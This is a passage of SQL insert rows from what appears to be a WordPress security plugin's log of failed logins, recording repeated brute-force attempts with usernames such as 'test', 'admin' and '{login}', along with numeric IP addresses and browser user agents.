(102498, 1498912376.728349, 1, 'loginFailInvalidUsername', 'test', 0, 1317833414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102499, 1498912716.830766, 1, 'loginFailInvalidUsername', 'test', 0, 1571556693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102500, 1498912717.873928, 1, 'loginFailInvalidUsername', 'test', 0, 1571556693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102501, 1498913399.113720, 1, 'loginFailValidUsername', 'admin', 1, 1979542344, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102502, 1498913624.631242, 1, 'loginFailInvalidUsername', 'test', 0, 1504999297, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102503, 1498913625.674891, 1, 'loginFailInvalidUsername', 'test', 0, 1504999297, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102504, 1498914095.838440, 1, 'loginFailInvalidUsername', 'test', 0, 1416601116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102505, 1498914096.901950, 1, 'loginFailInvalidUsername', 'test', 0, 1416601116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102506, 1498914978.342593, 1, 'loginFailInvalidUsername', 'test', 0, 3283233138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102507, 1498914979.565343, 1, 'loginFailInvalidUsername', 'test', 0, 3283233138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102508, 1498915344.698106, 1, 'loginFailInvalidUsername', '{login}', 0, 1835211794, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102509, 1498917256.377883, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3109159307, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102510, 1498919138.750403, 1, 'loginFailValidUsername', 'admin', 1, 1908535302, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102511, 1498920214.561732, 1, 'loginFailInvalidUsername', 'test', 0, 1569557062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102512, 1498920216.255528, 1, 'loginFailInvalidUsername', 'test', 0, 1569557062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102513, 1498921088.057668, 1, 'loginFailInvalidUsername', '{login}', 0, 1406152144, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102514, 1498922130.772930, 1, 'loginFailInvalidUsername', 'test', 0, 769478934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102515, 1498922132.053663, 1, 'loginFailInvalidUsername', 'test', 0, 769478934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102516, 1498922151.643413, 1, 'loginFailInvalidUsername', 'test', 0, 1493206923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102517, 1498922152.663412, 1, 'loginFailInvalidUsername', 'test', 0, 1493206923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102518, 1498923056.287628, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547740144, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102519, 1498925077.962471, 1, 'loginFailInvalidUsername', 'test', 0, 1124633035, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102520, 1498925079.155366, 1, 'loginFailInvalidUsername', 'test', 0, 1124633035, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102521, 1498926606.497674, 1, 'loginFailInvalidUsername', '{login}', 0, 1382287881, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102522, 1498927375.365512, 1, 'loginFailInvalidUsername', 'test', 0, 778276980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102523, 1498927511.259828, 1, 'loginFailInvalidUsername', 'test', 0, 3154114328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102524, 1498927512.649825, 1, 'loginFailInvalidUsername', 'test', 0, 3154114328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102525, 1498928680.359253, 1, 'loginFailValidUsername', 'admin', 1, 1467287951, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102526, 1498928680.396542, 1, 'loginFailValidUsername', 'julie', 2, 2249451108, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102527, 1498929523.938265, 1, 'loginFailInvalidUsername', 'test', 0, 3230918435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102528, 1498929525.378862, 1, 'loginFailInvalidUsername', 'test', 0, 3230918435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102529, 1498930108.327923, 1, 'loginFailInvalidUsername', 'test', 0, 1743552465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102530, 1498930113.633189, 1, 'loginFailInvalidUsername', 'test', 0, 1743552465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102531, 1498930156.775911, 1, 'loginFailValidUsername', 'admin', 1, 1835212154, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102532, 1498931897.660018, 1, 'loginFailInvalidUsername', '{login}', 0, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102533, 1498932912.166905, 1, 'loginFailInvalidUsername', 'test', 0, 1389595016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102534, 1498932913.241273, 1, 'loginFailInvalidUsername', 'test', 0, 1389595016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102535, 1498933603.373359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833976244, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102536, 1498938606.359598, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406385447, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102537, 1498940280.143123, 1, 'loginFailValidUsername', 'admin', 1, 1308955926, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102538, 1498941320.703377, 1, 'loginFailInvalidUsername', 'test', 0, 3211865851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102539, 1498942616.611534, 1, 'loginFailInvalidUsername', 'test', 0, 3321174249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102540, 1498942617.958379, 1, 'loginFailInvalidUsername', 'test', 0, 3321174249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102541, 1498943554.109320, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3582797194, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102542, 1498943682.976373, 1, 'loginFailInvalidUsername', 'test', 0, 3373612601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102543, 1498943684.378969, 1, 'loginFailInvalidUsername', 'test', 0, 3373612601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102544, 1498944450.691229, 1, 'loginFailInvalidUsername', 'test', 0, 3154286681, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102545, 1498944451.839174, 1, 'loginFailInvalidUsername', 'test', 0, 3154286681, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102546, 1498945172.472702, 1, 'loginFailValidUsername', 'admin', 1, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102547, 1498945619.659779, 1, 'loginFailInvalidUsername', 'test', 0, 523176129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102548, 1498945620.743357, 1, 'loginFailInvalidUsername', 'test', 0, 523176129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102549, 1498946990.359328, 1, 'loginFailInvalidUsername', 'test', 0, 1593762795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102550, 1498946991.841186, 1, 'loginFailInvalidUsername', 'test', 0, 1593762795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102551, 1498948138.808332, 1, 'loginFailInvalidUsername', 'test', 0, 48140760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102552, 1498948140.218791, 1, 'loginFailInvalidUsername', 'test', 0, 48140760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102553, 1498948326.595492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1541065241, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102554, 1498949487.580029, 1, 'loginFailInvalidUsername', 'test', 0, 1443044267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102555, 1498949618.290491, 1, 'loginFailInvalidUsername', 'test', 0, 3168301617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102556, 1498950230.362576, 1, 'loginFailInvalidUsername', 'test', 0, 1626131942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102557, 1498950231.462550, 1, 'loginFailInvalidUsername', 'test', 0, 1626131942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102558, 1498951504.411891, 1, 'loginFailInvalidUsername', '{login}', 0, 93749945, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102559, 1498952750.737556, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102560, 1498952751.842055, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102561, 1498953089.646448, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1053943371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102562, 1498953609.714865, 1, 'loginFailInvalidUsername', 'test', 0, 2588452463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102563, 1498953611.741485, 1, 'loginFailInvalidUsername', 'test', 0, 2588452463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102564, 1498954389.129196, 1, 'loginFailInvalidUsername', 'test', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102565, 1498954390.313101, 1, 'loginFailInvalidUsername', 'test', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102566, 1498954552.023421, 1, 'loginFailInvalidUsername', 'test', 0, 1438777814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102567, 1498954552.984463, 1, 'loginFailInvalidUsername', 'test', 0, 1438777814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102568, 1498954703.130364, 1, 'loginFailValidUsername', 'admin', 1, 3105429741, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102569, 1498957270.610423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.94.41 (KHTML, like Gecko) Version/5.3.8 Safari/531.86'),
(102570, 1498957291.126097, 1, 'loginFailInvalidUsername', 'test', 0, 3037638382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102571, 1498957292.626038, 1, 'loginFailInvalidUsername', 'test', 0, 3037638382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102572, 1498958025.817035, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1583005739, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102573, 1498958244.317248, 1, 'loginFailInvalidUsername', 'test', 0, 1550770426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102574, 1498958245.237135, 1, 'loginFailInvalidUsername', 'test', 0, 1550770426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102575, 1498959524.667179, 1, 'loginFailInvalidUsername', 'test', 0, 3731698192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102576, 1498959645.514565, 1, 'loginFailValidUsername', 'admin', 1, 3107039351, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102577, 1498961262.492031, 1, 'loginFailInvalidUsername', '{login}', 0, 762716335, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102578, 1498962762.245506, 1, 'loginFailInvalidUsername', 'test', 0, 1549936997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102579, 1498962899.186223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978717628, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102580, 1498964561.257545, 1, 'loginFailValidUsername', 'admin', 1, 1499487333, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102581, 1498964563.120995, 1, 'loginFailValidUsername', 'admin', 1, 1499487333, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102582, 1498964927.157665, 1, 'loginFailInvalidUsername', 'test', 0, 700293587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102583, 1498964930.559413, 1, 'loginFailInvalidUsername', 'test', 0, 700293587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102584, 1498966204.732353, 1, 'loginFailInvalidUsername', '{login}', 0, 3151105913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102585, 1498967392.080024, 1, 'loginFailInvalidUsername', 'test', 0, 1777049476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102586, 1498969206.847070, 1, 'loginFailValidUsername', 'admin', 1, 1839458818, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'),
(102587, 1498969481.805556, 1, 'loginFailValidUsername', 'admin', 1, 1521617214, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102588, 1498970487.693511, 1, 'loginFailInvalidUsername', 'test', 0, 657922338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102589, 1498971962.636790, 1, 'loginFailInvalidUsername', 'test', 0, 1228460843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102590, 1498971963.871013, 1, 'loginFailInvalidUsername', 'test', 0, 1228460843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102591, 1498972881.746911, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3566133939, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102592, 1498974562.568490, 1, 'loginFailValidUsername', 'admin', 1, 3254658408, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102593, 1498976234.698118, 1, 'loginFailInvalidUsername', '{login}', 0, 1835212158, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102594, 1498977863.725933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3002985501, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102595, 1498977974.462299, 1, 'loginFailInvalidUsername', 'test', 0, 1235922150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102596, 1498980232.685195, 1, 'loginFailInvalidUsername', 'test', 0, 2681021276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102597, 1498980233.766216, 1, 'loginFailInvalidUsername', 'test', 0, 2681021276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102598, 1498981149.327055, 1, 'loginFailInvalidUsername', '{login}', 0, 1833987480, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102599, 1498982817.425918, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307655556, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102600, 1498984426.389075, 1, 'loginFailValidUsername', 'admin', 1, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102601, 1498985496.006629, 1, 'loginFailInvalidUsername', 'test', 0, 3556288374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102602, 1498985497.471550, 1, 'loginFailInvalidUsername', 'test', 0, 3556288374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102603, 1498986074.666852, 1, 'loginFailInvalidUsername', '{login}', 0, 1343619483, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102604, 1498987787.098474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833985512, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102605, 1498988910.996378, 1, 'loginFailInvalidUsername', 'test', 0, 1743572606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102606, 1498988912.328648, 1, 'loginFailInvalidUsername', 'test', 0, 1743572606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102607, 1498989505.867912, 1, 'loginFailValidUsername', 'admin', 1, 3105030883, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102608, 1498990988.139068, 1, 'loginFailInvalidUsername', 'test', 0, 2875283979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102609, 1498991149.681785, 1, 'loginFailInvalidUsername', '{login}', 0, 3582503888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102610, 1498993192.651018, 1, 'loginFailInvalidUsername', 'test', 0, 3398331244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102611, 1498993194.029716, 1, 'loginFailInvalidUsername', 'test', 0, 3398331244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102612, 1498994507.332061, 1, 'loginFailValidUsername', 'admin', 1, 1729922310, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102613, 1498997068.617812, 1, 'loginFailInvalidUsername', 'test', 0, 2956551613, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102614, 1498997069.766033, 1, 'loginFailInvalidUsername', 'test', 0, 2956551613, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102615, 1498998820.713356, 1, 'loginFailInvalidUsername', 'test', 0, 1360878850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102616, 1498998821.739530, 1, 'loginFailInvalidUsername', 'test', 0, 1360878850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102617, 1498999445.195788, 1, 'loginFailInvalidUsername', 'test', 0, 3389113218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102618, 1498999446.589112, 1, 'loginFailInvalidUsername', 'test', 0, 3389113218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102619, 1498999615.606717, 1, 'loginFailValidUsername', 'admin', 1, 1478285310, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102620, 1499000074.401570, 1, 'loginFailInvalidUsername', 'test', 0, 778257480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102621, 1499000075.627660, 1, 'loginFailInvalidUsername', 'test', 0, 778257480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102622, 1499001354.910504, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039254, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102623, 1499001596.636167, 1, 'loginFailInvalidUsername', 'test', 0, 1744484549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102624, 1499001598.359578, 1, 'loginFailInvalidUsername', 'test', 0, 1744484549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102625, 1499003074.270374, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 48297797, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102626, 1499003159.530836, 1, 'loginFailInvalidUsername', 'test', 0, 1728419331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102627, 1499003161.447238, 1, 'loginFailInvalidUsername', 'test', 0, 1728419331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102628, 1499005847.737354, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.99.42 (KHTML, like Gecko) Chrome/57.4.0187.5459 Safari/534.50 OPR/40.6.1800.6172'),
(102629, 1499006297.096235, 1, 'loginFailInvalidUsername', 'test', 0, 1570986826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102630, 1499006298.109246, 1, 'loginFailInvalidUsername', 'test', 0, 1570986826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102631, 1499006476.985029, 1, 'loginFailInvalidUsername', 'test', 0, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102632, 1499006526.626876, 1, 'loginFailInvalidUsername', '{login}', 0, 1541065254, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102633, 1499007067.789803, 1, 'loginFailInvalidUsername', 'test', 0, 3280869997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102634, 1499007068.871938, 1, 'loginFailInvalidUsername', 'test', 0, 3280869997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102635, 1499007559.271185, 1, 'loginFailValidUsername', 'admin', 1, 1053976948, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'),
(102636, 1499008225.750504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1533920903, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102637, 1499009683.056377, 1, 'loginFailInvalidUsername', 'test', 0, 1337145077, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102638, 1499009684.078781, 1, 'loginFailInvalidUsername', 'test', 0, 1337145077, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102639, 1499009815.881044, 1, 'loginFailInvalidUsername', 'test', 0, 2979932285, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102640, 1499009817.259300, 1, 'loginFailInvalidUsername', 'test', 0, 2979932285, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102641, 1499009861.331066, 1, 'loginFailValidUsername', 'admin', 1, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102642, 1499010934.836393, 1, 'loginFailInvalidUsername', 'test', 0, 3317472021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102643, 1499010937.959518, 1, 'loginFailInvalidUsername', 'test', 0, 3317472021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102644, 1499011298.149185, 1, 'loginFailInvalidUsername', 'test', 0, 3106308979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102645, 1499011299.076247, 1, 'loginFailInvalidUsername', 'test', 0, 3106308979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102646, 1499011517.593721, 1, 'loginFailInvalidUsername', '{login}', 0, 3632859043, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102647, 1499011994.587054, 1, 'loginFailInvalidUsername', 'test', 0, 1451120174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102648, 1499011995.546894, 1, 'loginFailInvalidUsername', 'test', 0, 1451120174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102649, 1499013180.780896, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046696106, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102650, 1499014842.564839, 1, 'loginFailValidUsername', 'admin', 1, 1521628529, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
